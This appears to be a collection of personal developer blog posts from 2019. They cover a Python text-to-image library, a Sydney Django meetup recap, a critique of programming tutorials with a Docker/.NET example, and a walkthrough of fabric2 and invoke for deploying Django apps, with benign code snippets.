I don’t really use a word processor much, and I hate taking screenshots like that. My tool of choice is a text editor like VSCode, but that looks really terrible when you take a screenshot.

Also, I’ve been toying with the idea of distributing my translations via a web service. Some translations I do aren’t of publicly available content, so the idea is to deliver the translations only to people who have paid for this exclusive content. With a web service, I could also invite other translators to provide translations.

So I wrote some Python code! I released a library called txtimg!

You can install it like this:

$ pip install txtimg

And here’s how you use it:

from txtimg import TxtImg

text = """
What did Sushi A say to Sushi B?

What's up B? (WASABI)
"""

t = TxtImg()
img = t.generate_from_text(text)
img.save("wasabi.png")

This is a thin wrapper on top of the Pillow library. You pass in a string, and it returns a Pillow image object. There are some configuration parameters that I probably should have put more thought into, but it works.

In hindsight, I could have also just used pandoc but that might be complicated to install on a server. Or it was probably just LaTeX that was difficult to install, I can’t remember.

I’m planning to add more features to this depending on how it goes with my translating thing.

If you want to see my code repo, you can find it here: https://github.com/yoongkang/txtimg

SyDjango August 2019

2019-08-22T00:00:00+00:00

After a lengthy hiatus, SyDjango came back in August 2019!

The event was co-sponsored and co-organised by Airteam and Cover Genius. Artem and the rest of the fine people at Cover Genius have very kindly taken care of a lot of the logistics for this meetup. Many thanks to Artem and everyone at Cover Genius for their help.

It was a great night of fantastic talks! Many thanks to our speakers, Iqbal Bhatti, Amit Saha, and Sam Scheding for giving really great talks.

I apologise for having to leave early, as I had a flight to Melbourne very early in the morning the next day.

We have already booked the venue for our October and November meetups. We are of course looking for speakers again! Please let me or Artem know if you are interested in giving a talk. To get in contact with us, we would encourage you to join our Slack channel. You can join using this form here: https://sydjango.herokuapp.com. Please excuse the crappy design, I should really change that. Alternatively you could just email me.

We now also have an official Twitter account. Follow us there for general updates: https://twitter.com/sydjango

Of course, please also reach out if you have any questions about the meetup.

Tutorials suck

2019-08-16T00:00:00+00:00

If you do any programming at all, you’ve done some tutorials.

They suck.

Maybe that’s a little harsh. More accurately, I mean that the value you get from tutorials is almost always somewhat limited unless it solves the exact situation you’re in. I’ve never done a tutorial that significantly increased my understanding.

I think in theory it’s possible to write a tutorial that doesn’t suck, but all the ones I’ve used disappointed me in one way or another.

A tutorial is like a cooking recipe, and unless you’re trying to cook the exact thing in the recipe, it’s not very helpful for much else. The recipe could tell you the steps, but often doesn’t succeed in telling you why the steps are there, or how they can be applied to other dishes. If you’re lucky they tell you which steps are optional, or which ingredients can be substituted with something else.

It’s much the same with tutorials. Just a series of steps, which you follow mechanically but don’t understand. I don’t know if it’s the format of tutorials that makes it hard to explain things in detail, or if we as a profession have not figured out the best way to write a tutorial.

Let me give an example. Recently, I’ve had to write some C# on .NET for some reason. I don’t usually work with this technology, and this was a one-off project. I really did not want to install .NET on my Mac.

So I thought I’d use Docker. Go ahead and google “Docker C# .NET”, and one of the top results is this tutorial from Microsoft.

Now, I think this is a useful tutorial, and looks very well written. I don’t want to single out this tutorial as one that sucks. And I certainly don’t want to bash the authors.

It’s just that it didn’t tell me what I needed.

The tutorial starts off by… telling me to install .NET on my Mac, and then to run a command to create the project. This was the exact thing I was trying to avoid! Why do I need to install .NET on my host computer when I could use a perfectly good .NET Docker container, whose image the tutorial says I’ll have to pull anyway?

I tried looking for other tutorials, and they all started with the same steps. No results for “generate .NET project using Docker”. Urgh.

Luckily I knew a little bit about Docker and knew that I could run commands on a container using e.g. docker-compose run service dotnet new console. I also knew about volumes, and if I used them, any files I generated from those commands would also be in my host machine. That gave me what I needed.
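
A rough sketch of that idea, written as a small Python helper that only builds the command line rather than running it. It uses plain docker run instead of docker-compose so that no compose file is needed. The image name, the /app mount point, and the helper name are assumptions for illustration, not something taken from the tutorial.

```python
import os
import shlex

# Assumed image name for illustration; use whichever .NET SDK image you actually pull.
DOTNET_IMAGE = "mcr.microsoft.com/dotnet/sdk"


def dotnet_in_docker(args, project_dir, image=DOTNET_IMAGE):
    """Build a `docker run` command that runs `dotnet <args>` inside a container.

    project_dir is bind-mounted at /app (an arbitrary choice), so any files the
    command generates in the container also appear on the host.
    """
    host_dir = os.path.abspath(project_dir)
    return [
        "docker", "run", "--rm",
        "-v", f"{host_dir}:/app",  # volume: host directory <-> container /app
        "-w", "/app",              # run the command from the mounted directory
        image,
        "dotnet", *args,
    ]


if __name__ == "__main__":
    cmd = dotnet_in_docker(["new", "console"], ".")
    # Print the command instead of running it, so this is safe to try anywhere.
    print(shlex.join(cmd))
```

Pasting the printed command into a terminal with Docker installed should generate the project files in the current directory, without .NET ever being installed on the host.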

Sometimes, as in this case, you won’t find a single tutorial that tells you what you need. Instead, you figure this out by having some random facts floating around in your head and somehow connecting the dots.

That’s why I don’t envy anyone starting out programming. It’s completely insane how much of the know-how you need to do your job is either undocumented or documented poorly. Often what you really need is buried deep in some obscure part of the docs, and scattered across several places too.

Which is a shame, because often our first instinct is to reach for tutorials.

We either need to write better tutorials, or find some better format.

My fabric deployment script (fabric2)

2019-04-18T00:00:00+00:00

Since 2018, there’s been a new version of fabric, also known as fabric2.

It comes with an updated API, and is incompatible with the old fabric 1.x fabfiles.

It’s also split up some functionality into a few different libraries, including invoke and patchwork.

There was a rant on Reddit about the changes that the new version introduced.

I chimed in with some of my own complaints, which were mainly due to what I believed was inadequate documentation.

After that I regretted it. It wasn’t very nice to the developers who obviously put in a lot of work to release the new version, and obviously it wasn’t very productive either.

So instead of just complaining, I decided to make a blog post that would actually help the community and encourage more people to use it.

My confusion with the documentation

As mentioned, some functionality was split out into several other libraries. That means you’ll need to look at the documentation for each library separately.

For example, anything to do with CLI and task running that isn’t “strictly SSH” is now in a library called Invoke.

So if you’re used to the old primary API of fabric, which was to define a task and then run it from the command line using fab <task-name>, you probably want to be looking at the documentation for invoke. Fabric has a thin wrapper on top of invoke for tasks, and Fabric’s documentation simply refers you to Invoke.

Unfortunately, there were a few things that took me way too long to figure out.

Chief among them is how fabric and invoke work together. For example, a lot of fabric’s documentation deals with using Connection objects:

from fabric.connection import Connection

connection = Connection("username@remote-ip")

print(connection.run("ls"))

If you’re used to some of the old fabric methods like cd(), well, you can’t find them in the Connection object. What you get is run() and not much else.

But when I look at invoke’s documentation, they clearly have methods like cd() on an object passed in as the first argument in a task. This is called a Context object.

For example here’s an invoke task:

from invoke import task

@task
def some_task(c):
    with c.cd("some-directory"):
        c.run("ls")

Well, that’s what I need. But that’s a Context object, not a fabric Connection object.

What’s a Context object?

Looking at the “Getting Started” documentation, it first says (emphasis mine):

Defining and running task functions

The core use case for Invoke is setting up a collection of task functions and executing them. This is pretty easy – all you need is to make a file called tasks.py importing the task decorator and decorating one or more functions. You will also need to add an arbitrarily-named context argument (convention is to use c, ctx or context) as the first positional arg. Don’t worry about using this context parameter yet.

Okay. Eventually they’ll explain what it is, right?

Sure enough, if you scroll down you see this bit:

Aside: what exactly is this ‘context’ arg anyway?

A common problem task runners face is transmission of “global” data - values loaded from configuration files or other configuration vectors, given via CLI flags, generated in ‘setup’ tasks, etc.

Some libraries (such as Fabric 1.x) implement this via module-level attributes, which makes testing difficult and error prone, limits concurrency, and increases implementation complexity.

Invoke encapsulates state in explicit Context objects, handed to tasks when they execute. The context is the primary API endpoint, offering methods which honor the current state (such as Context.run) as well as access to that state itself.

Maybe I’m unfamiliar with task runners in general, but I don’t really understand what these paragraphs mean.
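
My best reading, for what it’s worth, is something like the toy sketch below. It doesn’t use Invoke at all; ToyContext and the function names are made up purely to contrast module-level state with state that is handed to each task explicitly.

```python
# Style 1: module-level "global" state, roughly the Fabric 1.x approach.
env = {"host": None}


def deploy_with_globals():
    # The task reads whatever happens to be in the module-level dict right now.
    return f"deploying to {env['host']}"


# Style 2: state lives on an explicit object passed to every task.
class ToyContext:
    """Made-up stand-in for a context object; not Invoke's real class."""

    def __init__(self, host):
        self.host = host


def deploy_with_context(c):
    # Everything the task needs arrives through its first argument.
    return f"deploying to {c.host}"


if __name__ == "__main__":
    env["host"] = "staging"
    print(deploy_with_globals())

    # Two contexts can coexist without overwriting each other,
    # which is awkward to do with a single shared global.
    staging, production = ToyContext("staging"), ToyContext("production")
    print(deploy_with_context(staging))
    print(deploy_with_context(production))
```

The second style is also easier to test, because a test can build its own context instead of patching a shared global.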

Let’s try some stuff out and see if it works

So I decided to try and play around with the Context. The convention is to use c as its name, and a fabric Connection also starts with a c.

Could I just pass the Connection object into a task….?

from fabric import Connection
from fabric.tasks import task

@task
def sub_task(c):
    with c.cd("some-folder"):
        c.run("ls")

@task
def main_task(c):
    con = Connection("username@some-host")
    print(sub_task(con))

I’ll be damned, that actually worked!

That seems like a pretty important detail about using fabric, and fundamental in using fabric and invoke together – but it was really strange that it wasn’t documented anywhere. I had to discover it more or less by accident!

So if you’re curious where the cd() method went, the way to do it is to pass your Connection object into a task.
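
As far as I can tell, this works because fabric’s Connection is a subclass of invoke’s Context, so it inherits cd() while supplying its own run() that goes over SSH. The toy classes below are made up to show the shape of that relationship. They run nothing remotely and are not the libraries’ real implementation.

```python
from contextlib import contextmanager


class ToyContext:
    """Made-up stand-in for a task context: tracks directories, runs 'locally'."""

    def __init__(self):
        self.cwds = []
        self.log = []

    @contextmanager
    def cd(self, path):
        # Remember the directory for the duration of the with-block.
        self.cwds.append(path)
        try:
            yield
        finally:
            self.cwds.pop()

    def _with_cwd(self, command):
        # Prefix the command with a cd into the remembered directories, if any.
        if not self.cwds:
            return command
        return f"cd {'/'.join(self.cwds)} && {command}"

    def run(self, command):
        self.log.append(("local", self._with_cwd(command)))


class ToyConnection(ToyContext):
    """Made-up stand-in for a connection: same cd(), but run() targets a host."""

    def __init__(self, host):
        super().__init__()
        self.host = host

    def run(self, command):
        self.log.append((self.host, self._with_cwd(command)))


def sub_task(c):
    # Works with either class, because both provide cd() and run().
    with c.cd("some-folder"):
        c.run("ls")


if __name__ == "__main__":
    con = ToyConnection("username@some-host")
    sub_task(con)
    print(con.log)
```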

Once that was cleared up, the API wasn’t actually that difficult to work with. In fact, it was pretty great! Some things that changed in the new release actually make a lot of sense.

What use cases am I interested in?

Ultimately, all I want to do is to use it as a way to automate deploying Django apps, instead of manually SSH-ing in and doing a git pull, or doing an rsync to copy files to the application server.
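
As a rough illustration of the git pull flavour, here’s a minimal sketch. The project path, branch name, virtualenv location, and service name are all hypothetical, and the function only assumes it is handed an object with cd() and run() methods, such as a fabric Connection.

```python
from contextlib import contextmanager

# Hypothetical values for illustration only.
PROJECT_DIR = "/srv/myproject"
BRANCH = "main"
PYTHON = "venv/bin/python"
SERVICE = "myproject"


def deploy(c):
    """Pull the latest code and refresh a Django app.

    `c` is anything with cd() and run(), e.g. a fabric Connection.
    """
    with c.cd(PROJECT_DIR):
        c.run(f"git pull origin {BRANCH}")
        c.run(f"{PYTHON} -m pip install -r requirements.txt")
        c.run(f"{PYTHON} manage.py migrate --noinput")
        c.run(f"{PYTHON} manage.py collectstatic --noinput")
    # Restart command is an assumption; it depends on how the app is served.
    c.run(f"sudo systemctl restart {SERVICE}")


class DryRun:
    """Stand-in for a Connection that records commands instead of running them."""

    def __init__(self):
        self.cwd = None
        self.commands = []

    @contextmanager
    def cd(self, path):
        previous, self.cwd = self.cwd, path
        try:
            yield
        finally:
            self.cwd = previous

    def run(self, command):
        self.commands.append((self.cwd, command))


if __name__ == "__main__":
    dry = DryRun()
    deploy(dry)
    for cwd, command in dry.commands:
        print(cwd, command)
```

The DryRun class is only there so the steps can be checked without a server. With fabric installed, the same deploy() function should accept a real Connection instead.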

I think it would be helpful to the community if we had some cookbooks or example fabfiles that we could use and modify quickly.

This seems to be missing both in the official docs and the community, so I decided to publish my own.

My deployment file

You can find it here in my GitHub repository:

https://github.com/yoongkang/fabric-deployment

This is a script that works for me personally, and hopefully it helps other people as well.
